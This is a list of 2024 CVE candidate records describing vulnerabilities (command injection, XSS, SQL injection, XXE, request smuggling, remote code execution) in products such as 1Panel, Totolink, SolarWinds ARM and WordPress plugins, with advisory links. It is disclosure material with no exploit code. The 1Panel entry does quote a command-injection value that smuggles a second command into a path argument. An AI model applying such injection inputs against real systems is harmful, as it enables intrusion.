CVE 2024 2357 Candidate The Libreswan Project was notified of an issue causing libreswan to restart under some IKEv2 retransmit scenarios when a connection is configured to use PreSharedKeys (authby=secret) and the connection cannot find a matching configured secret. When such a connection is automatically added on startup using the auto= keyword, it can cause repeated crashes leading to a Denial of Service. FEDORA:FEDORA-2024-1439ec2069 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJZJYFHKBIJ4ZK5GAWWFFR3AKJS6O5JX/ | FEDORA:FEDORA-2024-312a5ed3d5 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HEM46ALKF7NG6CAUKZ7KQERVOHWQIQKY/ | FEDORA:FEDORA-2024-92f0c71a01 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVQ7MZY6LFFGRWAJNTKKN2VSEFS2VPAR/ | MISC:CVE-2024-2357 | URL:https://libreswan.org/security/CVE-2024-2357 Assigned (20240309)
CVE 2024 23553 Candidate A cross-site scripting (XSS) vulnerability in the Web Reports component of HCL BigFix Platform exists due to missing a specific http header attribute. MISC:https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110209 | URL:https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110209 Assigned (20240118)
CVE 2024 23550 Candidate HCL DevOps Deploy / HCL Launch (UCD) could disclose sensitive user information when installing the Windows agent. MISC:https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110334 | URL:https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110334 Assigned (20240118)
CVE 2024 2355 Candidate A vulnerability has been found in keerti1924 Secret-Coder-PHP-Project 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /secret_coder.sql. The manipulation leads to inclusion of sensitive information in source code. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256315. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256315 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256315 | MISC:VDB-256315 | keerti1924 Secret-Coder-PHP-Project secret_coder.sql inclusion of sensitive information in source code | URL:https://vuldb.com/?id.256315 | MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/keerti1924%20%5BSecret-Coder-PHP-Project%20Sensitive%20Information%20Disclosure%5D%20on%20secret_coder.sql.md | URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/keerti1924%20%5BSecret-Coder-PHP-Project%20Sensitive%20Information%20Disclosure%5D%20on%20secret_coder.sql.md Assigned (20240309)
CVE 2024 2354 Candidate A vulnerability, which was classified as problematic, was found in Dreamer CMS 4.1.3. Affected is an unknown function of the file /admin/menu/toEdit. The manipulation of the argument id leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256314 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256314 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256314 | MISC:VDB-256314 | Dreamer CMS toEdit cross-site request forgery | URL:https://vuldb.com/?id.256314 | MISC:https://github.com/sweatxi/BugHub/blob/main/dreamer_cms_admin_menu_toEdit_csrf.pdf | URL:https://github.com/sweatxi/BugHub/blob/main/dreamer_cms_admin_menu_toEdit_csrf.pdf Assigned (20240309)
CVE 2024 2353 Candidate A vulnerability, which was classified as critical, has been found in Totolink X6000R 9.4.0cu.852_20230719. This issue affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component shttpd. The manipulation of the argument ip leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256313 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256313 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256313 | MISC:VDB-256313 | Totolink X6000R shttpd cstecgi.cgi setDiagnosisCfg os command injection | URL:https://vuldb.com/?id.256313 | MISC:https://github.com/OraclePi/repo/blob/main/totolink%20X6000R/1/X6000R%20AX3000%20WiFi%206%20Giga%20unauthed%20rce.md | URL:https://github.com/OraclePi/repo/blob/main/totolink%20X6000R/1/X6000R%20AX3000%20WiFi%206%20Giga%20unauthed%20rce.md Assigned (20240309)
CVE 2024 23525 Candidate The Spreadsheet::ParseXLSX package before 0.30 for Perl allows XXE attacks because it neglects to use the no_xxe option of XML::Twig. MISC:https://gist.github.com/phvietan/d1c95a88ab6e17047b0248d6bf9eac4a | MISC:https://github.com/MichaelDaum/spreadsheet-parsexlsx/issues/10 | MISC:https://metacpan.org/release/NUDDLEGG/Spreadsheet-ParseXLSX-0.30/changes | MLIST:[debian-lts-announce] 20240127 [SECURITY] [DLA 3723-1] libspreadsheet-parsexlsx-perl security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00018.html | MLIST:[oss-security] 20240118 CVE-2024-23525: Spreadsheet::ParseXLSX for Perl is vulnerable to XXE attacks | URL:http://www.openwall.com/lists/oss-security/2024/01/18/4 Assigned (20240117)
CVE 2024 23523 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Elementor Pro.This issue affects Elementor Pro: from n/a through 3.19.2. MISC:https://patchstack.com/database/vulnerability/elementor-pro/wordpress-elementor-pro-plugin-3-19-2-contributor-arbitrary-user-meta-data-retrieval-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/elementor-pro/wordpress-elementor-pro-plugin-3-19-2-contributor-arbitrary-user-meta-data-retrieval-vulnerability?_s_id=cve Assigned (20240117)
CVE 2024 23520 Candidate Missing Authorization vulnerability in AccessAlly PopupAlly.This issue affects PopupAlly: from n/a through 2.1.0. MISC:https://patchstack.com/database/vulnerability/popupally/wordpress-popupally-plugin-2-1-0-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/popupally/wordpress-popupally-plugin-2-1-0-broken-access-control-vulnerability?_s_id=cve Assigned (20240117)
CVE 2024 2352 Candidate A vulnerability, which was classified as critical, has been found in 1Panel up to 1.10.1-lts. Affected by this issue is the function baseApi.UpdateDeviceSwap of the file /api/v1/toolbox/device/update/swap. The manipulation of the argument Path with the input 123123123\nopen -a Calculator leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-256304. MISC:VDB-256304 | 1Panel swap baseApi.UpdateDeviceSwap command injection | URL:https://vuldb.com/?id.256304 | MISC:VDB-256304 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256304 | MISC:https://github.com/1Panel-dev/1Panel/pull/4131 | URL:https://github.com/1Panel-dev/1Panel/pull/4131 | MISC:https://github.com/1Panel-dev/1Panel/pull/4131#issue-2176105990 | URL:https://github.com/1Panel-dev/1Panel/pull/4131#issue-2176105990 | MISC:https://github.com/1Panel-dev/1Panel/pull/4131/commits/0edd7a9f6f5100aab98a0ea6e5deedff7700396c | URL:https://github.com/1Panel-dev/1Panel/pull/4131/commits/0edd7a9f6f5100aab98a0ea6e5deedff7700396c Assigned (20240309)
CVE 2024 23519 Candidate Cross-Site Request Forgery (CSRF) vulnerability in M&S Consulting Email Before Download.This issue affects Email Before Download: from n/a through 6.9.7. MISC:https://patchstack.com/database/vulnerability/email-before-download/wordpress-email-before-download-plugin-6-9-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/email-before-download/wordpress-email-before-download-plugin-6-9-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240117)
CVE 2024 23517 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Start Booking Scheduling Plugin – Online Booking for WordPress allows Stored XSS.This issue affects Scheduling Plugin – Online Booking for WordPress: from n/a through 3.5.10. MISC:https://patchstack.com/database/vulnerability/calendar-booking/wordpress-scheduling-plugin-online-booking-for-wordpress-plugin-3-5-10-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/calendar-booking/wordpress-scheduling-plugin-online-booking-for-wordpress-plugin-3-5-10-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240117)
CVE 2024 23516 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Calculators World CC BMI Calculator allows Stored XSS.This issue affects CC BMI Calculator: from n/a through 2.0.1. MISC:https://patchstack.com/database/vulnerability/cc-bmi-calculator/wordpress-cc-bmi-calculator-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/cc-bmi-calculator/wordpress-cc-bmi-calculator-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240117)
CVE 2024 23514 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ClickToTweet.Com Click To Tweet allows Stored XSS.This issue affects Click To Tweet: from n/a through 2.0.14. MISC:https://patchstack.com/database/vulnerability/click-to-tweet/wordpress-click-to-tweet-plugin-2-0-14-cross-site-scripting-xss-vulnerability-2?_s_id=cve | URL:https://patchstack.com/database/vulnerability/click-to-tweet/wordpress-click-to-tweet-plugin-2-0-14-cross-site-scripting-xss-vulnerability-2?_s_id=cve Assigned (20240117)
CVE 2024 23513 Candidate Deserialization of Untrusted Data vulnerability in PropertyHive.This issue affects PropertyHive: from n/a through 2.0.5. MISC:https://patchstack.com/database/vulnerability/propertyhive/wordpress-propertyhive-plugin-2-0-5-php-object-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/propertyhive/wordpress-propertyhive-plugin-2-0-5-php-object-injection-vulnerability?_s_id=cve Assigned (20240117)
CVE 2024 23512 Candidate Deserialization of Untrusted Data vulnerability in wpxpo ProductX – WooCommerce Builder & Gutenberg WooCommerce Blocks.This issue affects ProductX – WooCommerce Builder & Gutenberg WooCommerce Blocks: from n/a through 3.1.4. MISC:https://patchstack.com/database/vulnerability/product-blocks/wordpress-productx-plugin-3-1-4-php-object-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/product-blocks/wordpress-productx-plugin-3-1-4-php-object-injection-vulnerability?_s_id=cve Assigned (20240117)
CVE 2024 2351 Candidate A vulnerability classified as critical was found in CodeAstro Ecommerce Site 1.0. Affected by this vulnerability is an unknown functionality of the file action.php of the component Search. The manipulation of the argument cat_id/brand_id/keyword leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256303. MISC:VDB-256303 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256303 | MISC:VDB-256303 | CodeAstro Ecommerce Site Search action.php sql injection | URL:https://vuldb.com/?id.256303 | MISC:https://docs.qq.com/doc/DYklCV0thWnRaaWpY | URL:https://docs.qq.com/doc/DYklCV0thWnRaaWpY Assigned (20240309)
CVE 2024 23508 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins PDF Poster – PDF Embedder Plugin for WordPress allows Reflected XSS.This issue affects PDF Poster – PDF Embedder Plugin for WordPress: from n/a through 2.1.17. MISC:https://patchstack.com/database/vulnerability/pdf-poster/wordpress-pdf-poster-plugin-2-1-17-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/pdf-poster/wordpress-pdf-poster-plugin-2-1-17-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240117)
CVE 2024 23507 Candidate Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in InstaWP Team InstaWP Connect – 1-click WP Staging & Migration.This issue affects InstaWP Connect – 1-click WP Staging & Migration: from n/a through 0.1.0.9. MISC:https://patchstack.com/database/vulnerability/instawp-connect/wordpress-instawp-connect-plugin-0-1-0-9-sql-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/instawp-connect/wordpress-instawp-connect-plugin-0-1-0-9-sql-injection-vulnerability?_s_id=cve Assigned (20240117)
CVE 2024 23506 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in InstaWP Team InstaWP Connect – 1-click WP Staging & Migration.This issue affects InstaWP Connect – 1-click WP Staging & Migration: from n/a through 0.1.0.9. MISC:https://patchstack.com/database/vulnerability/instawp-connect/wordpress-instawp-connect-plugin-0-1-0-9-sensitive-data-exposure-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/instawp-connect/wordpress-instawp-connect-plugin-0-1-0-9-sensitive-data-exposure-vulnerability?_s_id=cve Assigned (20240117)
CVE 2024 23505 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DearHive PDF Viewer & 3D PDF Flipbook – DearPDF allows Stored XSS.This issue affects PDF Viewer & 3D PDF Flipbook – DearPDF: from n/a through 2.0.38. MISC:https://patchstack.com/database/vulnerability/dearpdf-lite/wordpress-pdf-viewer-3d-pdf-flipbook-dearpdf-plugin-2-0-38-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/dearpdf-lite/wordpress-pdf-viewer-3d-pdf-flipbook-dearpdf-plugin-2-0-38-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240117)
CVE 2024 23502 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in InfornWeb Posts List Designer by Category – List Category Posts Or Recent Posts allows Stored XSS.This issue affects Posts List Designer by Category – List Category Posts Or Recent Posts: from n/a through 3.3.2. MISC:https://patchstack.com/database/vulnerability/post-list-designer/wordpress-posts-list-designer-by-category-plugin-3-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/post-list-designer/wordpress-posts-list-designer-by-category-plugin-3-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240117)
CVE 2024 23501 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shopfiles Ltd Ebook Store allows Stored XSS.This issue affects Ebook Store: from n/a through 5.788. MISC:https://patchstack.com/database/vulnerability/ebook-store/wordpress-ebook-store-plugin-5-788-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/ebook-store/wordpress-ebook-store-plugin-5-788-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240117)
CVE 2024 23496 Candidate A heap-based buffer overflow vulnerability exists in the GGUF library gguf_fread_str functionality of llama.cpp Commit 18c2e17. A specially crafted .gguf file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1913 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1913 Assigned (20240118)
CVE 2024 23494 Candidate SQL injection vulnerability exists in GetDIAE_unListParameters. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 Assigned (20240312)
CVE 2024 23493 Candidate Mattermost fails to properly authorize the requests fetching team associated AD/LDAP groups, allowing a user to fetch details of AD/LDAP groups of a team that they are not a member of. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240226)
CVE 2024 23492 Candidate A weak encoding is used to transmit credentials for WS203VICM. MISC:https://clibrary-online.commend.com/en/cyber-security/security-advisories.html | URL:https://clibrary-online.commend.com/en/cyber-security/security-advisories.html | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-051-01 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-051-01 Assigned (20240130)
CVE 2024 23488 Candidate Mattermost fails to properly restrict the access of files attached to posts in an archived channel, resulting in members being able to access files of archived channels even if the “Allow users to view archived channels” option is disabled. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240226)
CVE 2024 23479 Candidate SolarWinds Access Rights Manager (ARM) was found to be susceptible to a Directory Traversal Remote Code Execution Vulnerability. If exploited, this vulnerability allows an unauthenticated user to achieve a Remote Code Execution. MISC:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23479 | URL:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23479 Assigned (20240117)
CVE 2024 23478 Candidate SolarWinds Access Rights Manager (ARM) was found to be susceptible to a Remote Code Execution Vulnerability. If exploited, this vulnerability allows an authenticated user to abuse a SolarWinds service, resulting in remote code execution. MISC:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23478 | URL:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23478 Assigned (20240117)
CVE 2024 23477 Candidate The SolarWinds Access Rights Manager (ARM) was found to be susceptible to a Directory Traversal Remote Code Execution Vulnerability. If exploited, this vulnerability allows an unauthenticated user to achieve a Remote Code Execution. MISC:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23477 | URL:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23477 Assigned (20240117)
CVE 2024 23476 Candidate The SolarWinds Access Rights Manager (ARM) was found to be susceptible to a Directory Traversal Remote Code Execution Vulnerability. If exploited, this vulnerability allows an unauthenticated user to achieve the Remote Code Execution. MISC:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23476 | URL:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23476 Assigned (20240117)
CVE 2024 23453 Candidate Android Spoon application version 7.11.1 to 8.6.0 uses hard-coded credentials, which may allow a local attacker to retrieve the hard-coded API key when the application binary is reverse-engineered. This API key may be used for unexpected access of the associated service. MISC:https://jvn.jp/en/jp/JVN96154238/ | URL:https://jvn.jp/en/jp/JVN96154238/ | MISC:https://play.google.com/store/apps/details?id=co.spoonme&hl=en_US | URL:https://play.google.com/store/apps/details?id=co.spoonme&hl=en_US | MISC:https://spoon-support.spooncast.net/jp/update | URL:https://spoon-support.spooncast.net/jp/update Assigned (20240117)
CVE 2024 23452 Candidate Request smuggling vulnerability in HTTP server in Apache bRPC 0.9.5~1.7.0 on all platforms allows attacker to smuggle request. Vulnerability Cause Description: The http_parser does not comply with the RFC-7230 HTTP 1.1 specification. Attack scenario: If a message is received with both a Transfer-Encoding and a Content-Length header field, such a message might indicate an attempt to perform request smuggling or response splitting. One particular attack scenario is that a bRPC made http server on the backend receiving requests in one persistent connection from frontend server that uses TE to parse request with the logic that 'chunk' is contained in the TE field. in that case an attacker can smuggle a request into the connection to the backend server. Solution: You can choose one solution from below: 1. Upgrade bRPC to version 1.8.0, which fixes this issue. Download link: https://github.com/apache/brpc/releases/tag/1.8.0 2. Apply this patch: https://github.com/apache/brpc/pull/2518 MISC:https://github.com/apache/brpc/pull/2518 | URL:https://github.com/apache/brpc/pull/2518 | MISC:https://github.com/apache/brpc/releases/tag/1.8.0 | URL:https://github.com/apache/brpc/releases/tag/1.8.0 | MISC:https://lists.apache.org/thread/kkvdpwyr2s2yt9qvvxfdzon012898vxd | URL:https://lists.apache.org/thread/kkvdpwyr2s2yt9qvvxfdzon012898vxd | MLIST:[oss-security] 20240208 CVE-2024-23452: Apache bRPC: HTTP request smuggling vulnerability | URL:http://www.openwall.com/lists/oss-security/2024/02/08/1 Assigned (20240117)
CVE 2024 23448 Candidate An issue was discovered whereby APM Server could log at ERROR level, a response from Elasticsearch indicating that indexing the document failed and that response would contain parts of the original document. Depending on the nature of the document that the APM Server attempted to ingest, this could lead to the insertion of sensitive or private information in the APM Server logs. MISC:https://discuss.elastic.co/t/apm-server-8-12-1-security-update-esa-2024-03/352688 | URL:https://discuss.elastic.co/t/apm-server-8-12-1-security-update-esa-2024-03/352688 | MISC:https://www.elastic.co/community/security | URL:https://www.elastic.co/community/security Assigned (20240116)
CVE 2024 23447 Candidate An issue was discovered in the Windows Network Drive Connector when using Document Level Security to assign permissions to a file, with explicit allow write and deny read. Although the document is not accessible to the user in Network Drive it is visible in search applications to the user. MISC:https://discuss.elastic.co/t/elastic-network-drive-connector-8-12-1-security-update-esa-2024-02/352687 | URL:https://discuss.elastic.co/t/elastic-network-drive-connector-8-12-1-security-update-esa-2024-02/352687 | MISC:https://www.elastic.co/community/security | URL:https://www.elastic.co/community/security Assigned (20240116)
CVE 2024 23446 Candidate An issue was discovered by Elastic, whereby the Detection Engine Search API does not respect Document-level security (DLS) or Field-level security (FLS) when querying the .alerts-security.alerts-{space_id} indices. Users who are authorized to call this API may obtain unauthorized access to documents if their roles are configured with DLS or FLS against the aforementioned index. MISC:https://discuss.elastic.co/t/kibana-8-12-1-security-update-esa-2024-01/352686 | URL:https://discuss.elastic.co/t/kibana-8-12-1-security-update-esa-2024-01/352686 | MISC:https://www.elastic.co/community/security | URL:https://www.elastic.co/community/security Assigned (20240116)
CVE 2024 23441 Candidate Vba32 Antivirus v3.36.0 is vulnerable to a Denial of Service vulnerability by triggering the 0x2220A7 IOCTL code of the Vba32m64.sys driver. MISC:https://fluidattacks.com/advisories/rollins/ | URL:https://fluidattacks.com/advisories/rollins/ | MISC:https://www.anti-virus.by/vba32 | URL:https://www.anti-virus.by/vba32 Assigned (20240116)
CVE 2024 23440 Candidate Vba32 Antivirus v3.36.0 is vulnerable to an Arbitrary Memory Read vulnerability. The 0x22200B IOCTL code of the Vba32m64.sys driver allows to read up to 0x802 of memory from ar arbitrary user-supplied pointer. MISC:https://fluidattacks.com/advisories/adderley/ | URL:https://fluidattacks.com/advisories/adderley/ | MISC:https://www.anti-virus.by/vba32 | URL:https://www.anti-virus.by/vba32 Assigned (20240116)
CVE 2024 23439 Candidate Vba32 Antivirus v3.36.0 is vulnerable to an Arbitrary Memory Read vulnerability by triggering the 0x22201B, 0x22201F, 0x222023, 0x222027 ,0x22202B, 0x22202F, 0x22203F, 0x222057 and 0x22205B IOCTL codes of the Vba32m64.sys driver. MISC:https://fluidattacks.com/advisories/adderley/ | URL:https://fluidattacks.com/advisories/adderley/ | MISC:https://www.anti-virus.by/vba32 | URL:https://www.anti-virus.by/vba32 Assigned (20240116)
CVE 2024 2339 Candidate PostgreSQL Anonymizer v1.2 contains a vulnerability that allows a user who owns a table to elevate to superuser. A user can define a masking function for a column and place malicious code in that function. When a privileged user applies the masking rules using the static masking or the anonymous dump method, the malicious code is executed and can grant escalated privileges to the malicious user. PostgreSQL Anonymizer v1.2 does provide a protection against this risk with the restrict_to_trusted_schemas option, but that protection is incomplete. Users that don't own a table, especially masked users cannot exploit this vulnerability. The problem is resolved in v1.3. MISC:https://gitlab.com/dalibo/postgresql_anonymizer/-/commit/e517b38e62e50871b04011598e73a7308bdae9d9 | URL:https://gitlab.com/dalibo/postgresql_anonymizer/-/commit/e517b38e62e50871b04011598e73a7308bdae9d9 Assigned (20240308)
CVE 2024 23388 Candidate Improper authorization in handler for custom URL scheme issue in "Mercari" App for Android prior to version 5.78.0 allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack. MISC:https://jvn.jp/en/jp/JVN70818619/ | URL:https://jvn.jp/en/jp/JVN70818619/ Assigned (20240116)
CVE 2024 23387 Candidate FusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product. MISC:https://github.com/fusionpbx/fusionpbx/ | URL:https://github.com/fusionpbx/fusionpbx/ | MISC:https://jvn.jp/en/jp/JVN67215338/ | URL:https://jvn.jp/en/jp/JVN67215338/ | MISC:https://www.fusionpbx.com/ | URL:https://www.fusionpbx.com/ Assigned (20240116)
CVE 2024 2338 Candidate PostgreSQL Anonymizer v1.2 contains a SQL injection vulnerability that allows a user who owns a table to elevate to superuser when dynamic masking is enabled. PostgreSQL Anonymizer enables users to set security labels on tables to mask specified columns. There is a flaw that allows complex expressions to be provided as a value. This expression is then later used as it to create the masked views leading to SQL Injection. If dynamic masking is enabled, this will lead to privilege escalation to superuser after the label is created. Users that don't own a table, especially masked users cannot exploit this vulnerability. The problem is resolved in v1.3. MISC:https://gitlab.com/dalibo/postgresql_anonymizer/-/commit/f55daadba3fa8226029687964aa8889d01a79778 | URL:https://gitlab.com/dalibo/postgresql_anonymizer/-/commit/f55daadba3fa8226029687964aa8889d01a79778 Assigned (20240308)
CVE 2024 23349 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1. XSS attack when user enters summary. A logged-in user, when modifying their own submitted question, can input malicious code in the summary to create such an attack. Users are recommended to upgrade to version [1.2.5], which fixes the issue. MISC:https://lists.apache.org/thread/y5902t09vfgy7892z3vzr1zq900sgyqg | URL:https://lists.apache.org/thread/y5902t09vfgy7892z3vzr1zq900sgyqg | MLIST:[oss-security] 20240222 CVE-2024-23349: Apache Answer: XSS vulnerability when submitting summary | URL:http://www.openwall.com/lists/oss-security/2024/02/22/2 Assigned (20240116)
CVE 2024 23348 Candidate Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary JavaScript code by uploading a specially crafted SVG file. MISC:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html | URL:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html | MISC:https://jvn.jp/en/jp/JVN34565930/ | URL:https://jvn.jp/en/jp/JVN34565930/ Assigned (20240115)
CVE 2024 23347 Candidate Prior to v176, when opening a new project Meta Spark Studio would execute scripts defined inside of a package.json file included as part of that project. Those scripts would have the ability to execute arbitrary code on the system as the application. MISC:https://www.facebook.com/security/advisories/cve-2024-23347 | URL:https://www.facebook.com/security/advisories/cve-2024-23347 Assigned (20240115)
CVE 2024 23346 Candidate Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library prior to version 2024.2.20. This method insecurely utilizes `eval()` for processing input, enabling execution of arbitrary code when parsing untrusted input. Version 2024.2.20 fixes this issue. MISC:https://github.com/materialsproject/pymatgen/blob/master/pymatgen/symmetry/settings.py#L97C1-L111C108 | URL:https://github.com/materialsproject/pymatgen/blob/master/pymatgen/symmetry/settings.py#L97C1-L111C108 | MISC:https://github.com/materialsproject/pymatgen/commit/c231cbd3d5147ee920a37b6ee9dd236b376bcf5a | URL:https://github.com/materialsproject/pymatgen/commit/c231cbd3d5147ee920a37b6ee9dd236b376bcf5a | MISC:https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f | URL:https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f Assigned (20240115)
CVE 2024 23345 Candidate Nautobot is a Network Source of Truth and Network Automation Platform built as a web application. All users of Nautobot versions earlier than 1.6.10 or 2.1.2 are potentially impacted by a cross-site scripting vulnerability. Due to inadequate input sanitization, any user-editable fields that support Markdown rendering, including are potentially susceptible to cross-site scripting (XSS) attacks via maliciously crafted data. This issue is fixed in Nautobot versions 1.6.10 and 2.1.2. MISC:https://github.com/nautobot/nautobot/commit/17effcbe84a72150c82b138565c311bbee357e80 | URL:https://github.com/nautobot/nautobot/commit/17effcbe84a72150c82b138565c311bbee357e80 | MISC:https://github.com/nautobot/nautobot/commit/64312a4297b5ca49b6cdedf477e41e8e4fd61cce | URL:https://github.com/nautobot/nautobot/commit/64312a4297b5ca49b6cdedf477e41e8e4fd61cce | MISC:https://github.com/nautobot/nautobot/pull/5133 | URL:https://github.com/nautobot/nautobot/pull/5133 | MISC:https://github.com/nautobot/nautobot/pull/5134 | URL:https://github.com/nautobot/nautobot/pull/5134 | MISC:https://github.com/nautobot/nautobot/security/advisories/GHSA-v4xv-795h-rv4h | URL:https://github.com/nautobot/nautobot/security/advisories/GHSA-v4xv-795h-rv4h Assigned (20240115)
CVE 2024 23344 Candidate Tuleap is an Open Source Suite to improve management of software developments and collaboration. Some users might get access to restricted information when a process validates the permissions of multiple users (e.g. mail notifications). This issue has been patched in version 15.4.99.140 of Tuleap Community Edition. MISC:https://github.com/Enalean/tuleap/commit/0329e21d268510bc00fed707406103edabf10e42 | URL:https://github.com/Enalean/tuleap/commit/0329e21d268510bc00fed707406103edabf10e42 | MISC:https://github.com/Enalean/tuleap/security/advisories/GHSA-m3v5-2j5q-x85w | URL:https://github.com/Enalean/tuleap/security/advisories/GHSA-m3v5-2j5q-x85w | MISC:https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=0329e21d268510bc00fed707406103edabf10e42 | URL:https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=0329e21d268510bc00fed707406103edabf10e42 | MISC:https://tuleap.net/plugins/tracker/?aid=35862 | URL:https://tuleap.net/plugins/tracker/?aid=35862 Assigned (20240115)
